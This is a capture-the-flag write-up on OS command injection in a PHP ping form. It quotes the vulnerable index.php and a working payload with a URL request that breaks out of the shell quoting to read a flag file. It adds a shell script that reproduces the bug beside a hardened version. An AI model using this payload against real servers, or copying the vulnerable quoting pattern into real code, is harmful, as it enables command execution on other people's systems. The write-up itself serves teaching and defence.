ping me

OS Command Injection.

To start the challenge, we are given the source code of index.php, which contains the following:

<?php
    if (isset($_GET['ip'])) {
        $ip = $_GET['ip'];
        if (strpos($ip, " ")) {
            die("Spaces not allowed in the IP!");
        }
        $ip = str_replace("'", "\\'", $ip);
        $cmd = "ping -c1 -t1 '$ip'";
        if ($_GET['debug']) { echo "$cmd\n"; }
        echo shell_exec($cmd);
        die();
    }
?>
<html>
<body>
<form method="GET">
IP to ping: <input type="text" placeholder="IP" name="ip" />
<input type="submit" value="Ping" />
</form>
</body>
</html>

A couple of things to note from the source:

  1. The if statement rejects any ip parameter that contains a space. (Strictly, strpos() returns 0 for a space at index 0, and 0 is falsy in PHP, so a leading space would also slip past this check; the payload below simply avoids spaces instead.)
  2. Single quotes (') are escaped to \'. Inside a single-quoted shell string a backslash has no special meaning, though, so \' still terminates the quoted argument and the escaping protects nothing. escapeshellarg() exists for exactly this job.
  3. The value of the ip parameter is interpolated straight into the cmd string, which is then run through the system shell by shell_exec, so anything that breaks out of the single quotes executes as a command on the server.

To get around the first limitation I referenced PayloadsAllTheThings and used ${IFS}, which the shell expands to its internal field separator (space, tab and newline by default). Because the expansion is unquoted, the shell splits cat${IFS}/flag.txt into the two words cat and /flag.txt. To close the ping command I put '; at the start of the payload: the server rewrites the quote to \', but inside the single-quoted argument the backslash is literal, so the ' still ends the argument and the ; ends the ping command. The trailing \' keeps the line parseable: the server turns it into \\' and then appends its own closing quote, so the shell sees a literal backslash followed by an empty quoted string (a stray command named \ that fails harmlessly) instead of an unterminated quote, which would have been a syntax error and run nothing. After escaping, the server executes ping -c1 -t1 '\';cat${IFS}/flag.txt;\\'' as three separate commands. From there I built the final payload:

';cat${IFS}/flag.txt;\'

URL-encoded (only the quotes need encoding, as %27), the final request was:

/?debug=1&ip=%27;cat${IFS}/flag.txt;\%27

With debug=1 the constructed command was echoed back in the response, and the injected cat /flag.txt ran on the server and returned the flag.
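To make the quoting argument above concrete, here is an added example that re-implements the index.php logic in shell so the payload can be traced offline, with a hardened version beside it. This is not the challenge's code or the write-up's own; it assumes a stub ping function in place of /bin/ping (no network) and a flag in a constructed temp file rather than /flag.txt. The hardened function goes slightly beyond the page by allow-listing a dotted-quad IPv4 literal, which is the fix you would actually ship.

```shell
#!/bin/sh
# Added example, not part of the original write-up or the challenge source.
# Assumptions (constructed for this example): the flag lives in a temp file
# instead of /flag.txt, and a stub `ping` function stands in for /bin/ping so
# nothing touches the network.

FLAG_FILE=$(mktemp)
printf 'flag{constructed_example}\n' > "$FLAG_FILE"

# Stub for /bin/ping: just report the argv it received.
ping() { printf 'ping called with %d arg(s): %s\n' "$#" "$*"; }

# Mirrors index.php: reject spaces, turn ' into \', wrap in single quotes,
# then hand the whole string to a shell (shell_exec there, a subshell+eval here).
vuln_ping() {
  ip=$1
  case "$ip" in *" "*) echo "Spaces not allowed in the IP!"; return 1 ;; esac
  ip=$(printf '%s' "$ip" | sed "s/'/\\\\'/g")     # str_replace("'", "\\'", $ip)
  cmd="ping -c1 -t1 '$ip'"
  printf 'cmd: %s\n' "$cmd"                         # what debug=1 echoes back
  ( set +e; eval "$cmd" ) 2>/dev/null || true       # shell_exec($cmd); status ignored
}

# Hardened counterpart: allow-list exactly four decimal octets (0-255) and pass
# the value to ping as its own argv element. No shell ever parses user input.
safe_ping() {
  ip=$1
  n=0
  case "$ip" in *[!0-9.]*|""|.*|*.|*..*) echo "Invalid IP"; return 1 ;; esac
  for o in $(printf '%s' "$ip" | tr '.' ' '); do
    [ "$o" -le 255 ] || { echo "Invalid IP"; return 1; }
    n=$((n + 1))
  done
  [ "$n" -eq 4 ] || { echo "Invalid IP"; return 1; }
  ping -c1 -t1 "$ip"
}

# The write-up's payload, with the constructed flag path in place of /flag.txt:
#   ';cat${IFS}<flag file>;\'
payload="';cat\${IFS}$FLAG_FILE;\\'"

echo "== vulnerable =="
vuln_ping "$payload"      # prints the cmd line, then the flag
echo "== hardened =="
safe_ping "$payload"      # rejected before anything runs
safe_ping 127.0.0.1       # reaches the stub with three clean argv entries
```

Run it and compare the cmd: line with the explanation above: the quote that index.php "escaped" is the one that closes the argument. The PHP equivalent of safe_ping is to check the input with filter_var($ip, FILTER_VALIDATE_IP) and, if you must build a command string at all, to wrap the value with escapeshellarg() rather than a hand-rolled str_replace.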